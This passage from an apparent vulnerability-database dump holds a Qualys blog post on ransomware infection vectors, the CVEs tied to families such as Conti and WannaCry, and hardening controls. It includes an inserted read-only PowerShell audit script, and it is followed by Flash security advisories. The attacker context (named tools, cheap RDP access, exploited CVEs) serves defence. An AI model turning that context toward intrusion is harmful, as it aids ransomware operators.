cybercriminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. 
It is a very common practice in organizations because it provides easy remote access to systems. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. A Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above, known vulnerabilities and weaknesses are among the top infection vectors. \n\nThe Qualys research team has performed extensive research on 36 prevalent ransomware families and has mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is a sample list of some of the most widely used ransomware in attacks, along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE(s)**| **QID(s)** \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. 
This method of extortion-ware is used to force victims to pay the ransom in order to prevent the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files. | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using the AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCry, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. 
| CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together, such as internet-facing vulnerabilities, misconfigurations as well as unauthorized software. The Qualys Ransomware Risk Assessment & Remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to a ransomware-related vulnerability or misconfiguration and take needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n\n\nIn addition, organizations should implement a good cyber hygiene program to scan for vulnerabilities and discover misconfigurations regularly, with sufficient detection capabilities (such as QIDs) enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly and at the scale needed. \n\n### Qualys Ransomware Risk Assessment & Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from the Qualys product portfolio and how they can be uniquely valuable in the effort to combat ransomware attacks. \n\n#### Detect your critical data assets & monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nCSAM enables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. \n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. 
Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by functional category by analyzing their hardware and installed software. It extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as a ransomware attack vector. End-of-Support software is one of the first things attackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n### Continuous detection & prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports, for example hosts with Remote Desktop Protocol (RDP) enabled: \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, say \u201cRDP Asset\u201d. This automatically groups existing hosts with this exposure as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with RDP are identified, you want to detect which of these assets carry a ransomware-related vulnerability. VMDR automatically detects new vulnerabilities, such as those in Windows RDP and Exchange Server, based on the always updated KnowledgeBase. \n\nYou can see all impacted hosts tagged with the \u2018Ransomware\u2019 asset tag in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nor, to narrow the results to one family, for example WannaCry: \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nEither query returns a list of all impacted hosts. 
\n\nUsing VMDR prioritization, ransomware vulnerabilities can be easily prioritized with the \u201cRansomware\u201d Real-Time Threat Intelligence indicator. \n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With the live feed updated for all emerging high and medium risks, you can clearly see the hosts impacted by each threat. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\nQualys also provides a Unified Dashboard that brings together key metrics from all apps to show your overall security posture against ransomware-related data points such as: \n\n * Ransomware-related vulnerabilities \n * Unauthorized software \n * Misconfigurations leveraged by ransomware \n * Internet-facing hosts with RDP vulnerabilities, and many more\u2026 \n\nThe Unified Dashboard enables you to track your ransomware exposure, the impacted hosts, their status, and overall remediation in real time. \n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy, which contains the critical controls mapped to MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [FireEye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across the top techniques and can materially reduce the risk of ransomware attacks. These critical controls can limit an attacker's initial access and lateral movement around the network. 
\n\nAs organizations look to prevent attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating configuration assessment with Qualys Policy Compliance, organizations can ensure that golden images conform to security baselines, prevent misconfigurations from ever reaching those images, and identify configuration drift before it becomes a security risk. \n\n#### **Mitigation or Important Precautionary Measures and Controls** \n\nThe Qualys internal research team has identified the top five security measures and configuration controls that a security team should consider for their organization to prevent business interruption from a ransomware attack. The research is based on best practices published by FireEye (Mandiant), the Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Both policies and technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n\n 1. Enforce password policies, e.g. \n * Set a minimum password age. \n * Enable password complexity requirements. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop Protocol, e.g. \n * Disable RDP services if not necessary. \n * Close unused RDP ports and audit the network for systems using RDP. \n * Apply multi-factor authentication. \n * Disable or block the Server Message Block (SMB) protocol where it is not needed, and remove or disable outdated versions of SMB (SMBv1). \n * Apply RDP account controls (for example, restricting which accounts may log on through RDP). \n 3. Employ network security and firewalls, e.g. \n * Enforce firewall policy rules. \n * Use a default deny rule and allow only required networks and access. \n * Block common ports and protocols that are not required. \n 4. Enforce account use policies, e.g. \n * Apply account lockouts after a specified number of failed attempts. \n * Require admin approval for privileged operations. \n * Apply UAC restrictions on network logons, etc. 
\n * Assign least privilege to users. \n 5. Keep software updated \n * Ensure automatic updates are enabled. \n * Install patches and software updates in a timely manner, including for operating systems, applications, etc. \n\nQualys research has mapped misconfigurations to the relevant MITRE ATT&CK techniques (summarized in the table below) to define 237 configuration checks across five security areas (RDP hardening; user controls; network, protocol and port configuration security; share and password policies; and software update policies), helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force (T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: SMB/Windows Admin Shares (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive & Reactive Patching for Ransomware vulnerabilities** \n\nTo keep the ransomware vulnerability patches always up 
to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch, which automatically patches new ransomware-related vulnerabilities that are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of ransomware-related vulnerabilities, faster and at scale. For more information on Qualys automatic patch capabilities, refer to the blog post [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices with Qualys Patch Management allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys Patch Management to remediate ransomware-related vulnerabilities is to leverage the VMDR prioritization report described in a previous section, which detects assets with ransomware-related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware-related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine automatically maps the selected vulnerabilities to the patches required to remediate them in the customer\u2019s environment. This allows IT teams to focus on deploying those patch jobs without having to research vulnerabilities and manually find the relevant patches.\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. The webinar takes place October 21, 2021, at 10am Pacific. Sign up now! 
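The five control areas listed above (password policy, RDP and SMB hardening, host firewall, account-use policy and UAC, software updates) can be spot-checked on a single Windows host between Policy Compliance scans. The script below is an added example, not code from the Qualys post or from any Qualys product; it only reads standard Windows settings (the local security policy exported by `secedit`, the Terminal Server, UAC and Windows Update registry keys, the SMB server and firewall configuration) and reports pass/fail per control. The thresholds marked as assumptions (lockout threshold of at most 10, password history of at least 24, a hotfix within the last 45 days) are illustrative values chosen for this example, not numbers taken from the Qualys research.

```powershell
# Added example, not part of the Qualys post: a read-only spot check of the five
# control areas above on one Windows host. Run from an elevated PowerShell 5.1+
# session; every check is a query, nothing is changed. Thresholds marked
# "assumption" are illustrative values, not Qualys or CIS-mandated numbers.

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Area, [string]$Check, [bool]$Pass, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Area = $Area; Check = $Check; Pass = $Pass; Detail = $Detail })
}

# --- 1. Password policy and 4. account lockout: export the local security policy
# with secedit and read the [System Access] keys from the INF it writes.
$inf = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
secedit /export /cfg $inf | Out-Null
$pol = @{}
Get-Content $inf | ForEach-Object {
    if ($_ -match '^\s*(\w+)\s*=\s*(.+?)\s*$') { $pol[$Matches[1]] = $Matches[2] }
}
Remove-Item $inf -ErrorAction SilentlyContinue

Add-Finding 'Password' 'Minimum password age set'   ([int]$pol['MinimumPasswordAge'] -ge 1)   "MinimumPasswordAge=$($pol['MinimumPasswordAge'])"
Add-Finding 'Password' 'Complexity enabled'         ($pol['PasswordComplexity'] -eq '1')      "PasswordComplexity=$($pol['PasswordComplexity'])"
Add-Finding 'Password' 'History >= 24 (assumption)' ([int]$pol['PasswordHistorySize'] -ge 24) "PasswordHistorySize=$($pol['PasswordHistorySize'])"
$lockout = [int]$pol['LockoutBadCount']   # 0 means accounts never lock out
Add-Finding 'Account' 'Lockout after 1-10 failures (assumption)' ($lockout -ge 1 -and $lockout -le 10) "LockoutBadCount=$lockout"

# --- 2. RDP and SMB hardening
$ts = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdpDisabled = ($ts.fDenyTSConnections -eq 1)
Add-Finding 'RDP' 'RDP disabled' $rdpDisabled "fDenyTSConnections=$($ts.fDenyTSConnections)"
if (-not $rdpDisabled) {
    # If RDP must stay on, at least require Network Level Authentication.
    $nla = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp').UserAuthentication
    Add-Finding 'RDP' 'NLA required' ($nla -eq 1) "UserAuthentication=$nla"
}
try {
    $smb1 = (Get-SmbServerConfiguration).EnableSMB1Protocol
    Add-Finding 'SMB' 'SMBv1 server disabled' (-not $smb1) "EnableSMB1Protocol=$smb1"
} catch {
    Add-Finding 'SMB' 'SMBv1 server disabled' $false "Get-SmbServerConfiguration unavailable: $($_.Exception.Message)"
}

# --- 3. Host firewall: every profile on, inbound default not Allow
foreach ($p in Get-NetFirewallProfile) {
    $ok = ($p.Enabled -eq 'True') -and ($p.DefaultInboundAction -ne 'Allow')
    Add-Finding 'Firewall' "$($p.Name) profile enabled, inbound default block" $ok "Enabled=$($p.Enabled) DefaultInboundAction=$($p.DefaultInboundAction)"
}

# --- 4. UAC: enabled, and token filtering still applied to network logons by local accounts
$uac = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
Add-Finding 'Account' 'UAC enabled' ($uac.EnableLUA -eq 1) "EnableLUA=$($uac.EnableLUA)"
# LocalAccountTokenFilterPolicy=1 hands full admin tokens to local accounts over the
# network, which pass-the-hash style lateral movement relies on.
Add-Finding 'Account' 'UAC token filter on network logons' ($uac.LocalAccountTokenFilterPolicy -ne 1) "LocalAccountTokenFilterPolicy=$($uac.LocalAccountTokenFilterPolicy)"

# --- 5. Updates: not disabled by policy, service startable, something installed recently
$au = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -ErrorAction SilentlyContinue
Add-Finding 'Updates' 'Automatic updates not disabled by policy' ($au.NoAutoUpdate -ne 1) "NoAutoUpdate=$($au.NoAutoUpdate)"
$wu = Get-Service wuauserv
Add-Finding 'Updates' 'Windows Update service not disabled' ($wu.StartType -ne 'Disabled') "StartType=$($wu.StartType)"
$last = Get-HotFix | Where-Object InstalledOn | Sort-Object InstalledOn -Descending | Select-Object -First 1
$recent = ($null -ne $last) -and ($last.InstalledOn -gt (Get-Date).AddDays(-45))   # 45 days: assumption
Add-Finding 'Updates' 'Hotfix installed in last 45 days (assumption)' $recent "Last: $($last.HotFixID) on $($last.InstalledOn)"

# --- Report: one row per check, non-zero exit code if anything failed
$findings | Format-Table Area, Check, Pass, Detail -AutoSize
$failed = @($findings | Where-Object { -not $_.Pass }).Count
Write-Host ("{0} of {1} checks failed" -f $failed, $findings.Count)
exit ([int]($failed -gt 0))
```

The exit code makes the script usable from a scheduled task or a configuration-management run; the `Detail` column carries the raw setting so a failed row can be compared directly with the corresponding Policy Compliance control. Domain-joined hosts receive the password and lockout settings from Group Policy, so the values `secedit` exports there are the effective ones, not local overrides.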
\n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment & Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment & Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n<https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf> <https://www.ic3.gov/Media/Y2019/PSA191002> <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": "The Rise of Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", 
"CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T20:37:01", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.616.\n\nSecurity Fix(es):\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities, detailed in the Adobe Security Bulletin listed in the\nReferences section, could allow an attacker to create a specially crafted SWF\nfile that would cause flash-plugin to crash, execute arbitrary code, or disclose\nsensitive information when the victim loaded a page containing the malicious SWF\ncontent. 
(CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013,\nCVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018,\nCVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\nCVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\nCVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-08T00:00:00", "type": "redhat", "title": "(RHSA-2016:0610) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2018-06-07T05:04:18", "id": "RHSA-2016:0610", "href": "https://access.redhat.com/errata/RHSA-2016:0610", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:42", "description": "- CVE-2016-1006 (JIT spraying mitigation bypass)\n\nThese updates harden a mitigation against JIT spraying attacks that\ncould be used to bypass memory layout randomization mitigations.\n\n- CVE-2016-1015 CVE-2016-1019 (arbitrary code execution)\n\nThese updates resolve type confusion vulnerabilities that could lead to\ncode execution.\n\n- CVE-2016-1011 CVE-2016-1013 CVE-2016-1016 CVE-2016-1017 CVE-2016-1031\n (arbitrary code execution)\n\nThese updates resolve use-after-free vulnerabilities that could lead to\ncode execution.\n\n- CVE-2016-1012 CVE-2016-1020 CVE-2016-1021 CVE-2016-1022 CVE-2016-1023\n CVE-2016-1024 CVE-2016-1025 CVE-2016-1026 CVE-2016-1027 CVE-2016-1028\n CVE-2016-1029 CVE-2016-1032 CVE-2016-1033 (arbitrary code execution)\n\nThese updates resolve memory corruption vulnerabilities that could lead\nto code execution.\n\n- CVE-2016-1018 (arbitrary code execution)\n\nThese updates resolve a stack overflow vulnerability that could lead to\ncode execution.\n\n- CVE-2016-1030 (sandbox restriction bypass)\n\nThese updates resolve a security bypass vulnerability.\n\n- CVE-2016-1014 (arbitrary code execution)\n\nThese updates resolve a vulnerability in the directory search path used\nto find resources that could lead to code execution.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-10T00:00:00", "type": "archlinux", "title": "flashplugin: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 
10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2016-04-10T00:00:00", "id": "ASA-201604-7", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-April/000599.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nAdobe reports:\n\nThese updates harden a mitigation against JIT spraying attacks that\n\t could be used to bypass memory layout randomization mitigations\n\t (CVE-2016-1006).\nThese updates resolve type confusion vulnerabilities that could\n\t lead to code execution (CVE-2016-1015, CVE-2016-1019).\nThese updates resolve use-after-free vulnerabilities that could\n\t lead to code execution (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016,\n\t CVE-2016-1017, CVE-2016-1031).\nThese updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021,\n\t CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n\t CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n\t CVE-2016-1032, CVE-2016-1033).\nThese updates resolve a stack overflow 
vulnerability that could\n\t lead to code execution (CVE-2016-1018).\nThese updates resolve a security bypass vulnerability\n\t (CVE-2016-1030).\nThese updates resolve a vulnerability in the directory search path\n\t used to find resources that could lead to code execution\n\t (CVE-2016-1014).\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T00:00:00", "type": "freebsd", "title": "flash -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2016-04-07T00:00:00", "id": "07888B49-35C4-11E6-8E82-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/07888b49-35c4-11e6-8e82-002590263bf5.html", "cvss": {"score": 10.0, "vector": 
